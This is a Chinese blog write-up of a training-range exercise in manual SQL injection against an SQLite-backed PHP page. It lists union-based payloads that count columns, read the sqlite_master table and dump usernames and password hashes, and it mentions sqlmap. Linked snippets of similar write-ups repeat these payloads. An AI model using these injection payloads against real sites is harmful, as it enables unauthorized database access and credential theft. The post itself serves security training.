SQL手工注入漏洞测试(SQLite数据库)

已于 2022-10-06 14:42:55 修改
阅读量732 收藏
点赞数 1
分类专栏: sql注入 文章标签: 数据库 sql
于 2022-10-06 14:40:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47493074/article/details/127182909
版权

漏洞复现

在这里插入图片描述

判断列

order by 4

在这里插入图片描述

测试回显

union select 1,2,3,4

在这里插入图片描述

由于根据题意可知是sqlite数据库,许多MySQL数据库的语法不能使用。但是SQLite 存在一个表sqlite_master ,里面的字段:type/name/tbl_name/rootpage/sql记录着用户创建表的信息

爆表的字段

union select 1,name,sql,4 from sqlite_master limit 0,1

在这里插入图片描述

爆字段值

 union select 1,name,password,4 from WSTMart_reg limit 1,1

在这里插入图片描述
有一个是解密不了的,选第二个

sqlmap注入

在这里插入图片描述
在这里插入图片描述

Yolo山药
关注
专栏目录
SQLite 数据库注入总结
HBohan的博客
10-09 6355
前言 SQLite 是一个进程内的库,实现了自给自足的、无服务器的、零配置的、事务性的 SQL 数据库引擎。它是一个零配置的数据库,这意味着与其他数据库不一样,您不需要在系统中配置。SQLite 与 MySQL 还是有些区别的,SQLite 直接读写普通磁盘文件,每一个数据库就是一个文件,可以按应用程序需求进行静态或动态连接其存储文件进行数据操作。 SQLite 基础 在本篇文章中我们使用 SQLite3 来学习,SQLite3 的语法与 MySQL 相似。详细语法可以在这里学习:https://www.r
墨者学院 - SQL手工注入漏洞测试(SQLite数据库)
多崎巡礼的博客
08-20 1717
  网站公告存在注入点   ip/new_list.php?id=1 and 1=2 union select 1,name,sql,4 from sqlite_master limit 0,1 ip/new_list.php?id=1 and 1=2 union select 1,name,password,4 from WSTMart_reg      ...
WEB渗透Web突破篇-SQL注入SQLite
最新发布
qq_59468567的博客
07-31 350
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name' SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'
SQL手工注入漏洞测试(Sql Server数据库)
weixin_33853827的博客
01-21 108
还是先找到注入点,然后order by找出字段数:4 通过SQL语句中and 1=2 union select 1,2,3……,n联合查询,判断显示的是哪些字段,就是原本显示标题和内容时候的查询字段。此处返回的是错误页面,说明系统禁止使用union进行相关SQL查询,我们得使用其他方式进行手工SQL注入。 一、盲注 盲猜爆出表名 通过SQL语句中的a...
0x2E.SQL手工注入漏洞测试(SQLite数据库)
qq_31679787的博客
11-14 291
通过加单引号及使用and进行判断存在sql注入; 使用order by测试存在4列; 通过联合查询得到显示位; 通过sqlite_master隐藏表爆表名及建表语句; 建表语句中可以得到表名及列名,可以爆出数据; Md5解密后得到密码; 登录得到key; SQLite存在sqlite_maste...
墨者靶场 初级: SQL手工注入漏洞测试(SQLite数据库)
qq_43233085的博客
01-13 582
@[toc](墨者靶场 初级: SQL手工注入漏洞测试(SQLite数据库)) 题目 背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+SQLite,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。 实训目标 1.掌握SQL注入原理; 2.了解手工注入的方法; 3.了解SQLite的数据结构; 4.了解字符串的MD5加解密...
06#墨者靶场-SQL手工注入漏洞测试(SQLite数据库)
shy的博客
11-15 385
地址:https://www.mozhe.cn/bug/detail/UzRPT0FZSTZDeWVid2duMVcyV055dz09bW96aGUmozhe 1.打开靶场环境,发现熟悉的通告 2.输入单引号(异常)、and 1=1、and 1=2(异常)判断存在有SQL注入存在 http://219.153.49.228:45494/new_list.php?id=1%20and%20...
SQL手工注入大全:包含各种类型的SQL注入,实现手工注入的乐趣,此资源你值得拥有。
05-31
宽字节注入SQL手工注入漏洞测试(Oracle数据库)、SQL手工注入漏洞测试(...SQL手工注入漏洞测试(SQLite数据库)、SQL手工注入漏洞测试(Db2数据库)、SQL注入漏洞测试(参数加密)、SQL手工注入漏洞测试(MySQL数据库)、SQL...
SQLite手工注入Getshell技巧.pdf
03-19
本文将详细介绍如何利用SQLite手工注入技术来获取WebShell,包括从注入漏洞的发现到最终成功获取WebShell的过程。 #### 二、SQLite基础 SQLite是一种嵌入式的数据库系统,它将整个数据库保存在一个单一的磁盘...
SQL注入(不同数据库之间)
qi_SJQ_的博客
11-08 1261
简要学习各种数据库注入特点: 数据库:Access, mysql ,mssql(sql server) mongoDB, postgresql, sqlite,oracle, sybase等。 工具:Sqlmap, NoSQLAttack, Pangolin等。 其他数据库大体结构都相同,但access的数据库存在于asp网站内的一个文件夹下,不同网站对应不同数据库。 因此注入方式有所不同,不用注库名,而且没有access数据库没有文件读写功能等等特点。 故有以下结构: ...
墨者 - SQL手工注入漏洞测试(SQLite数据库)
吃肉唐僧的博客
07-05 1304
/new_list.php?id=1 order by 2测试注入点 有回显,并且测试有4个字段 盲猜表,admin,member,manage,都没有 投机取巧的方法没有......老老实实去爆表吧 测试回显位置,/new_list.php?id=1 union select 1,2,3,4 爆库,用database() 发现mysql的语法在这里不适合用...
SQLite 注入
12-16
SQLite 注入 如果您的站点允许用户通过网页输入,并将输入内容插入到 SQLite 数据库中,这个时候您就面临着一个被称为 SQL 注入的安全问题。本章节将向您讲解如何防止这种情况的发生,确保脚本和 SQLite 语句的安全。 注入通常在请求用户输入时发生,比如需要用户输入姓名,但用户却输入了一个 SQLite 语句,而这语句就会在不知不觉中在数据库上运行。 永远不要相信用户提供的数据,所以只处理通过验证的数据,这项规则是通过模式匹配来完成的。在下面的实例中,用户名 username 被限制为字母数字字符或者下划线,长度必须在 8 到 20 个字符之间 – 请根据需要修改这些规则。 if
手工SQL注入常用SQL语句
06-05
手工sql注入的一些常用语句,适合初学的时候看
android 漏洞库,android系统sqlite数据库注入漏洞
weixin_42116734的博客
05-27 362
漏洞概要缺陷编号:WooYun-2012-04550漏洞标题:android系统sqlite数据库注入漏洞相关厂商:android漏洞作者:冷森提交时间:2012-02-15 18:44公开时间:2012-02-15 18:44漏洞类型:设计错误/逻辑缺陷危害等级:中自评Rank:5漏洞状态:未联系到厂商或者厂商积极忽略Tags标签:漏洞详情披露状态:2012-02-15: 积极联系厂商并且等待厂...
SQL手工注入漏洞测试(Sql Server数据库)解题思路小记
Routine_limon的博客
07-14 307
靶环境:IIS+ASP+Sql Server,Aspx代码对客户端提交的参数未做任何过滤。 解题目标: 手工进行SQL注入测试,获取管理密码登录。 使用sqlmap获取数据库中的表名和字段名;如图: 通过:sqlmap.py -u http://219.153.49.228:48753/new_list.asp?id=2 --dbs 获取数据库中的表名 sqlmap.py -u http://2...
0x08.SQL手工注入漏洞测试(Sql Server数据库)
qq_31679787的博客
09-19 163
点击通知栏,出现注入页面; 爆数据库; 爆表名; 爆列名; 爆数据,但是发现得到的账号密码不正常; 将注入方式设置为布尔注入,得到账号密码; md5解密得到密码,登录得到key; ...
SQLite 被曝存在漏洞,数千应用受影响
CSDN资讯
12-17 1563
SQLite 被曝存在一个影响数千应用的漏洞,受害应用包括所有基于 Chromium 的浏览器。据 ZDNet 报导,该漏洞由腾讯 Blade 安全团队发现,允许攻击者在...
Android Sqlite 漏洞
梦翼-的博客
02-16 659
Android 版本在2.3.7和4.0.1之间有个sqlite漏洞,这个漏洞会导致任何第三方应用可以访问/data/data//databases/文件,这样就能读取你的私密数据,特别里面如果有密码什么的,读取方法如下: public class SqliteJournalLeakActivity extends Activity { @Override protec
腾讯安全团队披露SQLite数据库漏洞,数千款日常必备软件或受影响
mozhe_的博客
12-18 466
据报道,由腾讯刀锋安全团队发现的一个新的SQLite数据库漏洞可能会影响到数千款常用的桌面和移动应用程序,包括谷歌Chromium浏览器。具体而言,该漏洞允许攻击者在受害者的计算机上运行恶意代码,并可能会导致内存泄露或应用程序崩溃。 SQLite是一种轻量级数据库,支持Windows、Linux和Unix等主流操作系统,且能够与多种编程语言(如 Tcl、C#、PHP和Java等)结合使用。相比主...
SQLServer到SQLite数据库转换步骤详解
"将备份的SQLServer数据库转换为SQLite数据库的操作方法主要涉及以下几个步骤:首先,需要安装并登录SQLServer2005,创建一个新的数据库,然后通过还原功能将SQLServer备份文件导入新数据库,最后将数据从SQLServer...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值